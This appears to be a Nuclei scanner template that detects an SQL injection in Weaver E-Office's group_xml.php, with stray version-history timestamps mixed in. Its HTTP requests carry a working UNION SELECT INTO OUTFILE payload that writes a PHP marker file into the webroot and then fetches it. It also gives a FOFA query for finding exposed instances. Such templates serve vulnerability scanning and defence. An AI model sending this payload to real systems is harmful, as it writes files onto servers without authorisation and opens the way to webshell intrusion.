2023-09-13 11:22:00 +00:00
id : weaver-group-xml-sqli
info :
name : OA E-Office group_xml.php - SQL Injection
author : SleepingBag945
severity : critical
description : |
There is a SQL injection vulnerability in the Panwei OA E-Office group_xml.php file. Through the vulnerability, an attacker can write to the Webshell file to obtain server permissions.
reference :
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20group_xml.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
fofa-query : app="泛微-EOffice"
2023-09-13 11:22:00 +00:00
tags : weaver,e-office,oa,sqli
variables :
filename : "{{to_lower(rand_base(5))}}"
2023-09-17 16:11:07 +00:00
payload : "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
2023-09-13 11:22:00 +00:00
http :
- raw :
- |
GET /inc/group_user_list/group_xml.php?par={{base64(payload)}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
- |
GET /{{filename}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body_2
words :
2023-09-17 16:11:07 +00:00
- "758058d8987e7a9ec723bcdbec6c407e"
2023-09-13 11:22:00 +00:00
- type : status
status :
2023-10-14 11:27:55 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022077648b155365e5062f6fae7f30ac8e55fb206c6ddcc3fff6410d06c4d8f98510022100a68ed8e143bd838c10ddf987e370bc070f45e91488cb7ba9caa4b06f630860be:922c64590222798bb761d5b6d8e72950